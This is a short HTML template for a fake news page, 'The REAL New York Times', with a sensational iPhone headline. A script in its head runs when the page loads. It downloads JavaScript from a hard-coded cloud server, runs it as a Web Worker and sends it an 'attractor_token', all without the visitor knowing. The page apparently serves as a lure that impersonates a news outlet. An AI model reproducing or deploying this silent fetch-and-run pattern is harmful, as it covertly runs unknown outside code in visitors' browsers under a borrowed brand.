@(message: String)

<!DOCTYPE html>
<html>
  <head lang="en">
      <meta charset="UTF-8">
      <title>The REAL New York Times</title>
      <script type="text/javascript">
          var req = new XMLHttpRequest();
          req.open("GET", "//ec2-54-209-233-14.compute-1.amazonaws.com:9000/assets/scripts/worker.js", true);
          req.setRequestHeader('X-PINGOTHER', 'pingpong');
          req.setRequestHeader('Content-Type', 'application/json');
          req.onreadystatechange = function () {
              if (req.readyState == 4 && req.status == 200) {
                  var blob = new Blob([req.response], {type: "text/javascript"});
                  var url = window.URL.createObjectURL(blob);
                  var worker = new Worker(url);
                  worker.postMessage("attractor_token");
              }
          };
          req.send();
      </script>
  </head>
  <body>
  
    <h1>The REAL New York Times</h1>
    
    <h2>iPhone 6 Plus Bends!!!!</h2>
    <p><img src ="http://s1.ibtimes.com/sites/www.ibtimes.com/files/styles/v2_article_large/public/2014/09/25/samsung-ad.jpeg?itok=H3I9bwny"</p>
  
  </body>
</html>